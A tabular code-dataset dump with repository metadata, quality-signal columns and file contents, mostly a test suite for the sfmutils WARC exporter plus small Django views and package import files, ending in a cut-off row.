hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d6f52b668b979413c926812e48930807d0176fd3 | 30 | py | Python | main.py | eliotlim/explorer-bot-firmware | db776ad55a0fed6732c7b1a0cae25c126f53f555 | [
"MIT"
] | null | null | null | main.py | eliotlim/explorer-bot-firmware | db776ad55a0fed6732c7b1a0cae25c126f53f555 | [
"MIT"
] | null | null | null | main.py | eliotlim/explorer-bot-firmware | db776ad55a0fed6732c7b1a0cae25c126f53f555 | [
"MIT"
] | null | null | null | print('explorer-bot firmware') | 30 | 30 | 0.8 | 4 | 30 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033333 | 30 | 1 | 30 | 30 | 0.827586 | 0 | 0 | 0 | 0 | 0 | 0.677419 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
ba33653bdde0e0da69dbb095b95d3abe31c1ee09 | 105 | py | Python | blaze/compute/__init__.py | chdoig/blaze | caa5a497e1ca1ceb1cf585483312ff4cd74d0bda | [
"BSD-3-Clause"
] | 1 | 2015-01-18T23:59:57.000Z | 2015-01-18T23:59:57.000Z | blaze/compute/__init__.py | chdoig/blaze | caa5a497e1ca1ceb1cf585483312ff4cd74d0bda | [
"BSD-3-Clause"
] | null | null | null | blaze/compute/__init__.py | chdoig/blaze | caa5a497e1ca1ceb1cf585483312ff4cd74d0bda | [
"BSD-3-Clause"
] | null | null | null | from __future__ import absolute_import, division, print_function
from .core import compute, compute_one
| 26.25 | 64 | 0.847619 | 14 | 105 | 5.857143 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 105 | 3 | 65 | 35 | 0.88172 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.5 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
ba52008c4d4f4dfe7c434dfb04f94e9a4c5d919c | 21,412 | py | Python | tests/sfmutils/test_exporter.py | NGTmeaty/sfm-utils | 47ac6b8a894f5b02d947d76c74aa61d59cb5d48d | [
"MIT"
] | 2 | 2016-05-08T06:44:13.000Z | 2016-05-16T15:07:22.000Z | tests/sfmutils/test_exporter.py | NGTmeaty/sfm-utils | 47ac6b8a894f5b02d947d76c74aa61d59cb5d48d | [
"MIT"
] | 13 | 2015-12-02T22:00:22.000Z | 2021-10-29T21:01:01.000Z | tests/sfmutils/test_exporter.py | NGTmeaty/sfm-utils | 47ac6b8a894f5b02d947d76c74aa61d59cb5d48d | [
"MIT"
] | 4 | 2020-05-27T05:05:05.000Z | 2021-02-12T22:28:47.000Z | import tests
import os
import tempfile
import shutil
import json
from mock import MagicMock, patch, Mock, PropertyMock
import iso8601
from sfmutils.exporter import BaseTable, BaseExporter, CODE_WARC_MISSING, CODE_NO_WARCS, CODE_BAD_REQUEST
from sfmutils.api_client import ApiClient
from sfmutils.warc_iter import IterItem
from sfmutils.utils import datetime_now
from kombu import Producer, Connection, Exchange
class TestExporter(tests.TestCase):
def setUp(self):
self.warc_base_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "warcs")
self.warcs = [{"warc_id": "9dc0b9c3a93a49eb8f713330b43f954c",
"path": "test_1-20151202200525007-00000-30033-GLSS-F0G5RP-8000.warc.gz",
"sha1": "000ffb3371eadb507d77d181ca3f0c5d3c74a2fc", "bytes": 460518,
"date_created": "2016-02-22T14:49:07Z"},
{"warc_id": "d3f524b52de0495b9abbf3b36b1fb06f",
"path": "test_1-20151202190229530-00000-29525-GLSS-F0G5RP-8000.warc.gz",
"sha1": "28076c245bc23d5e18e8531c19700dec869e2f9a",
"bytes": 58048,
"date_created": "2016-02-22T14:37:26Z"}]
self.warc_filepaths = [
os.path.join(self.warc_base_path, "test_1-20151202200525007-00000-30033-GLSS-F0G5RP-8000.warc.gz"),
os.path.join(self.warc_base_path, "test_1-20151202190229530-00000-29525-GLSS-F0G5RP-8000.warc.gz")]
self.export_path = tempfile.mkdtemp()
self.working_path = tempfile.mkdtemp()
def tearDown(self):
if os.path.exists(self.export_path):
shutil.rmtree(self.export_path)
if os.path.exists(self.working_path):
shutil.rmtree(self.working_path)
@patch("sfmutils.exporter.ApiClient", autospec=True)
# Mock out Producer
@patch("sfmutils.consumer.ConsumerProducerMixin.producer", new_callable=PropertyMock, spec=Producer)
def test_export_collection(self, mock_producer, mock_api_client_cls):
mock_warc_iter_cls = MagicMock()
mock_table_cls = MagicMock()
mock_table = MagicMock(spec=BaseTable)
mock_table_cls.side_effect = [mock_table]
mock_table.__iter__ = Mock(return_value=iter([[("key1", "key2"), ("k1v1", "k2v1"), ("k1v2", "k2v2")], ]))
mock_api_client = MagicMock(spec=ApiClient)
mock_api_client_cls.side_effect = [mock_api_client]
mock_api_client.warcs.side_effect = [self.warcs]
mock_connection = MagicMock(spec=Connection)
mock_exchange = MagicMock(spec=Exchange)
mock_exchange.name = "test exchange"
item_date_start = "2007-01-25T12:00:00Z"
item_datetime_start = iso8601.parse_date(item_date_start)
item_date_end = "2008-02-25T12:00:00Z"
item_datetime_end = iso8601.parse_date(item_date_end)
harvest_date_start = "2007-03-25T12:00:00Z"
harvest_date_end = "2008-04-25T12:00:00Z"
export_message = {
"id": "test1",
"type": "test_user",
"collection": {
"id": "005b131f5f854402afa2b08a4b7ba960"
},
"format": "csv",
"segment_size": None,
"path": self.export_path,
"dedupe": True,
"item_date_start": item_date_start,
"item_date_end": item_date_end,
"harvest_date_start": harvest_date_start,
"harvest_date_end": harvest_date_end,
}
exporter = BaseExporter("http://test", mock_warc_iter_cls, mock_table_cls, self.working_path,
warc_base_path=self.warc_base_path, host="testhost")
exporter.mq_config = True
exporter._producer_connection = mock_connection
exporter.exchange = mock_exchange
exporter.routing_key = "export.start.test.test_user"
exporter.message = export_message
exporter.on_message()
mock_api_client_cls.assert_called_once_with("http://test")
mock_api_client.warcs.assert_called_once_with(collection_id="005b131f5f854402afa2b08a4b7ba960",
seed_ids=[], harvest_date_start=harvest_date_start,
harvest_date_end=harvest_date_end)
mock_table_cls.assert_called_once_with(self.warc_filepaths, True, item_datetime_start,
item_datetime_end, [], None)
self.assertTrue(exporter.result.success)
csv_filepath = os.path.join(self.export_path, "test1_001.csv")
self.assertTrue(os.path.exists(csv_filepath))
with open(csv_filepath, "r") as f:
lines = f.readlines()
self.assertEqual(3, len(lines))
name, _, kwargs = mock_producer.mock_calls[1]
self.assertEqual("export.status.test.test_user", kwargs["routing_key"])
export_status_message = kwargs["body"]
self.assertEqual("running", export_status_message["status"])
self.assertTrue(iso8601.parse_date(export_status_message["date_started"]))
self.assertEqual("test1", export_status_message["id"])
self.assertEqual("Base Exporter", export_status_message["service"])
self.assertEqual("testhost", export_status_message["host"])
self.assertTrue(export_status_message["instance"])
name, _, kwargs = mock_producer.mock_calls[3]
self.assertEqual("export.status.test.test_user", kwargs["routing_key"])
export_status_message = kwargs["body"]
self.assertEqual("completed success", export_status_message["status"])
self.assertTrue(iso8601.parse_date(export_status_message["date_started"]))
self.assertTrue(iso8601.parse_date(export_status_message["date_ended"]))
self.assertEqual("test1", export_status_message["id"])
self.assertEqual("Base Exporter", export_status_message["service"])
self.assertEqual("testhost", export_status_message["host"])
self.assertTrue(export_status_message["instance"])
@patch("sfmutils.exporter.ApiClient", autospec=True)
# Mock out Producer
@patch("sfmutils.consumer.ConsumerProducerMixin.producer", new_callable=PropertyMock, spec=Producer)
def test_export_dehydrate(self, mock_producer, mock_api_client_cls):
mock_warc_iter_cls = MagicMock()
mock_table_cls = MagicMock()
mock_table = MagicMock(spec=BaseTable)
mock_table_cls.side_effect = [mock_table]
mock_table.__iter__ = Mock(return_value=iter([[("key1", "key2"), ("k1v1", "k2v1"), ("k1v2", "k2v2")], ]))
mock_table.id_field.return_value = "key2"
mock_api_client = MagicMock(spec=ApiClient)
mock_api_client_cls.side_effect = [mock_api_client]
mock_api_client.warcs.side_effect = [self.warcs]
mock_connection = MagicMock(spec=Connection)
mock_exchange = MagicMock(spec=Exchange)
mock_exchange.name = "test exchange"
export_message = {
"id": "test1",
"type": "test_user",
"collection": {
"id": "005b131f5f854402afa2b08a4b7ba960"
},
"format": "dehydrate",
"segment_size": None,
"path": self.export_path,
}
exporter = BaseExporter("http://test", mock_warc_iter_cls, mock_table_cls, self.working_path,
warc_base_path=self.warc_base_path, host="testhost")
exporter.mq_config = True
exporter._producer_connection = mock_connection
exporter.exchange = mock_exchange
exporter.routing_key = "export.start.test.test_user"
exporter.message = export_message
exporter.on_message()
mock_api_client_cls.assert_called_once_with("http://test")
mock_api_client.warcs.assert_called_once_with(collection_id="005b131f5f854402afa2b08a4b7ba960",
seed_ids=[], harvest_date_end=None, harvest_date_start=None)
mock_table_cls.assert_called_once_with(self.warc_filepaths, False, None, None, [], None)
self.assertTrue(exporter.result.success)
txt_filepath = os.path.join(self.export_path, "test1_001.txt")
self.assertTrue(os.path.exists(txt_filepath))
with open(txt_filepath, "r") as f:
lines = f.readlines()
self.assertEqual(2, len(lines))
self.assertEqual("k2v1\n", lines[0])
name, _, kwargs = mock_producer.mock_calls[3]
self.assertEqual("export.status.test.test_user", kwargs["routing_key"])
export_status_message = kwargs["body"]
self.assertEqual("completed success", export_status_message["status"])
self.assertEqual("test1", export_status_message["id"])
@patch("sfmutils.exporter.ApiClient", autospec=True)
def test_export_seeds(self, mock_api_client_cls):
mock_warc_iter_cls = MagicMock()
mock_table_cls = MagicMock()
mock_table = MagicMock(spec=BaseTable)
mock_table_cls.side_effect = [mock_table]
mock_table.__iter__ = Mock(return_value=iter([[("key1", "key2"), ("k1v1", "k2v1"), ("k1v2", "k2v2")], ]))
mock_api_client = MagicMock(spec=ApiClient)
mock_api_client_cls.side_effect = [mock_api_client]
mock_api_client.warcs.side_effect = [self.warcs]
export_message = {
"id": "test2",
"type": "test_user",
"seeds": [
{
"id": "005b131f5f854402afa2b08a4b7ba960",
"uid": "uid1"
},
{
"id": "105b131f5f854402afa2b08a4b7ba960",
"uid": "uid2"
},
],
"format": "csv",
"segment_size": None,
"path": self.export_path,
}
exporter = BaseExporter("http://test", mock_warc_iter_cls, mock_table_cls, self.working_path,
warc_base_path=self.warc_base_path, host="testhost")
exporter.routing_key = "export.start.test.test_user"
exporter.message = export_message
exporter.on_message()
mock_api_client_cls.assert_called_once_with("http://test")
mock_api_client.warcs.assert_called_once_with(collection_id=None,
seed_ids=["005b131f5f854402afa2b08a4b7ba960",
"105b131f5f854402afa2b08a4b7ba960"],
harvest_date_start=None, harvest_date_end=None)
mock_table_cls.assert_called_once_with(self.warc_filepaths, False, None, None, ["uid1", "uid2"], None)
self.assertTrue(exporter.result.success)
csv_filepath = os.path.join(self.export_path, "test2_001.csv")
self.assertTrue(os.path.exists(csv_filepath))
with open(csv_filepath, "r") as f:
lines = f.readlines()
self.assertEqual(3, len(lines))
@patch("sfmutils.exporter.ApiClient", autospec=True)
def test_export_collection_missing_warc(self, mock_api_client_cls):
mock_api_client = MagicMock(spec=ApiClient)
mock_api_client_cls.side_effect = [mock_api_client]
export_message = {
"id": "test3",
"type": "test_user",
"collection": {
"id": "005b131f5f854402afa2b08a4b7ba960"
},
"seeds": [
{
"id": "005b131f5f854402afa2b08a4b7ba960",
"uid": "uid1"
}
],
"format": "csv",
"segment_size": None,
"path": self.export_path
}
exporter = BaseExporter("http://test", None, None, self.working_path, warc_base_path=self.warc_base_path,
host="testhost")
exporter.routing_key = "export.start.test.test_user"
exporter.message = export_message
exporter.on_message()
mock_api_client_cls.assert_called_once_with("http://test")
self.assertFalse(exporter.result.success)
self.assertEqual(CODE_BAD_REQUEST, exporter.result.errors[0].code)
@patch("sfmutils.exporter.ApiClient", autospec=True)
# Mock out Producer
@patch("sfmutils.consumer.ConsumerProducerMixin.producer", new_callable=PropertyMock, spec=Producer)
def test_export_collection_and_seeds(self, mock_producer, mock_api_client_cls):
mock_api_client = MagicMock(spec=ApiClient)
mock_api_client_cls.side_effect = [mock_api_client]
warcs = [{"warc_id": "9dc0b9c3a93a49eb8f713330b43f954c",
"path": "xtest_1-20151202165907873-00000-306-60892de9dfc6-8001.warc.gz",
"sha1": "000ffb3371eadb507d77d181ca3f0c5d3c74a2fc", "bytes": 460518,
"date_created": "2016-02-22T14:49:07Z"}]
mock_api_client.warcs.side_effect = [warcs]
mock_connection = MagicMock(spec=Connection)
mock_exchange = MagicMock(spec=Exchange)
mock_exchange.name = "test exchange"
export_message = {
"id": "test2",
"type": "test_user",
"collection": {
"id": "005b131f5f854402afa2b08a4b7ba960"
},
"format": "csv",
"segment_size": None,
"path": self.export_path
}
exporter = BaseExporter("http://test", None, None, self.working_path, warc_base_path=self.warc_base_path,
host="testhost")
exporter.mq_config = True
exporter._producer_connection = mock_connection
exporter.exchange = mock_exchange
exporter.routing_key = "export.start.test.test_user"
exporter.message = export_message
exporter.on_message()
mock_api_client_cls.assert_called_once_with("http://test")
mock_api_client.warcs.assert_called_once_with(collection_id="005b131f5f854402afa2b08a4b7ba960",
seed_ids=[], harvest_date_end=None, harvest_date_start=None)
self.assertFalse(exporter.result.success)
name, _, kwargs = mock_producer.mock_calls[3]
self.assertEqual("export.status.test.test_user", kwargs["routing_key"])
export_status_message = kwargs["body"]
self.assertEqual("completed failure", export_status_message["status"])
self.assertTrue(iso8601.parse_date(export_status_message["date_started"]))
self.assertTrue(iso8601.parse_date(export_status_message["date_ended"]))
self.assertEqual("test2", export_status_message["id"])
self.assertTrue(CODE_WARC_MISSING, export_status_message["errors"][0]["code"])
self.assertTrue(CODE_NO_WARCS, export_status_message["errors"][0]["code"])
def test_export_full_json(self):
mock_warc_iter_cls = MagicMock()
mock_warc_iter = MagicMock()
mock_warc_iter_cls.side_effect = [mock_warc_iter]
mock_warc_iter.iter.return_value = [
IterItem(None, None, None, None, {"key1": "k1v1", "key2": "k2v1", "key3": "k3v1"}),
IterItem(None, None, None, None, {"key1": "k1v2", "key2": "k2v2", "key3": "k3v2"})]
export_filepath = os.path.join(self.export_path, "test")
now = datetime_now()
limit_uids = [11, 14]
exporter = BaseExporter(None, mock_warc_iter_cls, None, self.working_path, warc_base_path=self.warc_base_path,
host="testhost")
exporter._full_json_export(self.warcs, export_filepath, True, now, None, limit_uids, None)
mock_warc_iter_cls.assert_called_once_with(self.warcs, limit_uids)
mock_warc_iter.iter.assert_called_once_with(dedupe=True, item_date_start=now, item_date_end=None,
limit_item_types=None)
file_path = export_filepath + '_001.json'
self.assertTrue(os.path.exists(file_path))
with open(file_path, "r") as f:
lines = f.readlines()
self.assertEqual(2, len(lines))
self.assertDictEqual({"key1": "k1v1", "key2": "k2v1", "key3": "k3v1"}, json.loads(lines[0]))
def test_export_full_json_segment(self):
mock_warc_iter_cls = MagicMock()
mock_warc_iter = MagicMock()
mock_warc_iter_cls.side_effect = [mock_warc_iter]
mock_warc_iter.iter.return_value = [
IterItem(None, None, None, None, {"key1": "k1v1", "key2": "k2v1", "key3": "k3v1"}),
IterItem(None, None, None, None, {"key1": "k1v2", "key2": "k2v2", "key3": "k3v2"}),
IterItem(None, None, None, None, {"key1": "k1v3", "key2": "k2v3", "key3": "k3v3"}),
IterItem(None, None, None, None, {"key1": "k1v4", "key2": "k2v4", "key3": "k3v4"}),
IterItem(None, None, None, None, {"key1": "k1v5", "key2": "k2v5", "key3": "k3v5"}),
IterItem(None, None, None, None, {"key1": "k1v6", "key2": "k2v6", "key3": "k3v6"}),
IterItem(None, None, None, None, {"key1": "k1v7", "key2": "k2v7", "key3": "k3v7"})]
export_filepath = os.path.join(self.export_path, "test")
now = datetime_now()
limit_uids = [11, 14]
exporter = BaseExporter(None, mock_warc_iter_cls, None, self.working_path, warc_base_path=self.warc_base_path,
host="testhost")
exporter._full_json_export(self.warcs, export_filepath, True, now, None, limit_uids, 3)
mock_warc_iter_cls.assert_called_once_with(self.warcs, limit_uids)
mock_warc_iter.iter.assert_called_once_with(dedupe=True, item_date_start=now, item_date_end=None,
limit_item_types=None)
# file test_1.json, test_2.json , test_3.json
for idx in range(3):
file_path = export_filepath + '_' + str(idx + 1).zfill(3) + '.json'
self.assertTrue(os.path.exists(file_path))
with open(file_path, "r") as f:
lines = f.readlines()
# the test_3.json only has 1 row
if idx == 2:
self.assertEqual(1, len(lines))
else:
self.assertEqual(3, len(lines))
self.assertDictEqual(
{"key1": "k1v" + str(1 + idx * 3), "key2": "k2v" + str(1 + idx * 3), "key3": "k3v" + str(1 + idx * 3)},
json.loads(lines[0]))
class TestableTable(BaseTable):
def _header_row(self):
return "key1", "key2", "key3"
def _row(self, item):
return item["key1"], item["key2"], item["key3"]
class TestBaseTable(tests.TestCase):
def setUp(self):
self.warc_paths = ("/collection_set1/warc1.warc.gz", "/collection_set1/warc2.warc.gz")
def test_table(self):
mock_warc_iter_cls = MagicMock()
mock_warc_iter = MagicMock()
mock_warc_iter_cls.side_effect = [mock_warc_iter]
mock_warc_iter.iter.return_value = [
IterItem(None, None, None, None, {"key1": "k1v1", "key2": "k2v1", "key3": "k3v1"}),
IterItem(None, None, None, None, {"key1": "k1v2", "key2": "k2v2", "key3": "k3v2"}),
IterItem(None, None, None, None, {"key1": "k1v3", "key2": "k2v3", "key3": "k3v3"}),
IterItem(None, None, None, None, {"key1": "k1v4", "key2": "k2v4", "key3": "k3v4"}),
IterItem(None, None, None, None, {"key1": "k1v5", "key2": "k2v5", "key3": "k3v5"}),
IterItem(None, None, None, None, {"key1": "k1v6", "key2": "k2v6", "key3": "k3v6"}),
IterItem(None, None, None, None, {"key1": "k1v7", "key2": "k2v7", "key3": "k3v7"})]
now = datetime_now()
limit_uids = [11, 14]
tables = TestableTable(self.warc_paths, True, now, None, limit_uids, mock_warc_iter_cls, segment_row_size=2)
chunk_cnt = 0
for idx, table in enumerate(tables):
chunk_cnt += 1
for count, row in enumerate(table):
# every chunk should start with header row
if count == 0:
# Header row
# Just testing first and last, figuring these might change often.
self.assertEqual("key1", row[0])
self.assertEqual("key2", row[1])
self.assertEqual("key3", row[2])
# chunk 1 and row 2
if idx == 0 and count == 1:
# First row
self.assertEqual("k1v1", row[0])
self.assertEqual("k2v1", row[1])
self.assertEqual("k3v1", row[2])
# chunk 3 and row 3
if idx == 2 and count == 2:
self.assertEqual("k1v6", row[0])
self.assertEqual("k2v6", row[1])
self.assertEqual("k3v6", row[2])
# chunk 4 and row 2
if idx == 3 and count == 1:
self.assertEqual("k1v7", row[0])
self.assertEqual("k2v7", row[1])
self.assertEqual("k3v7", row[2])
self.assertEqual(4, chunk_cnt)
mock_warc_iter_cls.assert_called_with(self.warc_paths, limit_uids)
mock_warc_iter.iter.assert_called_once_with(dedupe=True, item_date_end=None, item_date_start=now,
limit_item_types=None)
| 46.853392 | 119 | 0.609425 | 2,407 | 21,412 | 5.1371 | 0.105941 | 0.03429 | 0.034695 | 0.021836 | 0.810028 | 0.759402 | 0.730044 | 0.716539 | 0.715245 | 0.698504 | 0 | 0.065586 | 0.267981 | 21,412 | 456 | 120 | 46.95614 | 0.7233 | 0.014384 | 0 | 0.621333 | 0 | 0 | 0.156702 | 0.070694 | 0 | 0 | 0 | 0 | 0.202667 | 1 | 0.034667 | false | 0 | 0.032 | 0.005333 | 0.08 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bae765f8927f71cad24e0c3ae4637bf3dadb7cb2 | 394 | py | Python | simple_page/views.py | aprild-c/WiCS_Website_v2 | 7e38a6c650efb07d224ba9914d08c8e4a3667101 | [
"MIT"
] | null | null | null | simple_page/views.py | aprild-c/WiCS_Website_v2 | 7e38a6c650efb07d224ba9914d08c8e4a3667101 | [
"MIT"
] | null | null | null | simple_page/views.py | aprild-c/WiCS_Website_v2 | 7e38a6c650efb07d224ba9914d08c8e4a3667101 | [
"MIT"
] | null | null | null | from django.shortcuts import render
def home(request):
return render(request, 'index.html', {})
def calendar(request):
return render(request, 'calendar.html', {})
def contact(request):
return render(request, 'contact.html', {})
def eboard(request):
return render(request, 'eboard.html', {})
def speaker_series(request):
return render(request, 'speaker_series.html', {}) | 24.625 | 53 | 0.69797 | 47 | 394 | 5.808511 | 0.340426 | 0.238095 | 0.347985 | 0.47619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.147208 | 394 | 16 | 53 | 24.625 | 0.8125 | 0 | 0 | 0 | 0 | 0 | 0.164557 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.454545 | false | 0 | 0.090909 | 0.454545 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
245a3029f68fdc792b9c3070faa273fe2f0ec3ea | 135 | py | Python | nbassignment/utils/__init__.py | DigiKlausur/nbassignment | 1bdb862009f4c9fa6954254e49c0c5c310842659 | [
"MIT"
] | null | null | null | nbassignment/utils/__init__.py | DigiKlausur/nbassignment | 1bdb862009f4c9fa6954254e49c0c5c310842659 | [
"MIT"
] | 9 | 2020-10-07T16:02:17.000Z | 2020-11-16T13:10:40.000Z | nbassignment/utils/__init__.py | DigiKlausur/nbassignment | 1bdb862009f4c9fa6954254e49c0c5c310842659 | [
"MIT"
] | 1 | 2022-02-14T02:33:45.000Z | 2022-02-14T02:33:45.000Z | from .notebookfilefinder import NotebookFileFinder
from .notebookvariableextractor import NotebookVariableExtractor
from .task import * | 45 | 64 | 0.888889 | 11 | 135 | 10.909091 | 0.454545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081481 | 135 | 3 | 65 | 45 | 0.967742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2460c221873dad1a9a606192d8d3ac65a3604bfa | 25 | py | Python | api/views/utils/__init__.py | arpanlaha/Harmonizer | 008a79ad3974525acfe8bb94edf34749bbda8f15 | [
"MIT"
] | 2 | 2020-04-05T07:13:16.000Z | 2020-04-05T18:18:54.000Z | api/views/utils/__init__.py | arpanlaha/Harmonizer | 008a79ad3974525acfe8bb94edf34749bbda8f15 | [
"MIT"
] | 21 | 2020-04-01T02:34:02.000Z | 2022-03-26T18:51:46.000Z | api/views/utils/__init__.py | arpanlaha/Harmonizer | 008a79ad3974525acfe8bb94edf34749bbda8f15 | [
"MIT"
] | null | null | null | from .model import model
| 12.5 | 24 | 0.8 | 4 | 25 | 5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 1 | 25 | 25 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2460e2878eb4ff7352a1f67475fa5b1d6c3c0d03 | 3,071 | py | Python | apis/event_api.py | tacklebox-webhooks/python | d2581110ab701467f5d584d0fd8ebb5f4c43a7aa | [
"MIT"
] | null | null | null | apis/event_api.py | tacklebox-webhooks/python | d2581110ab701467f5d584d0fd8ebb5f4c43a7aa | [
"MIT"
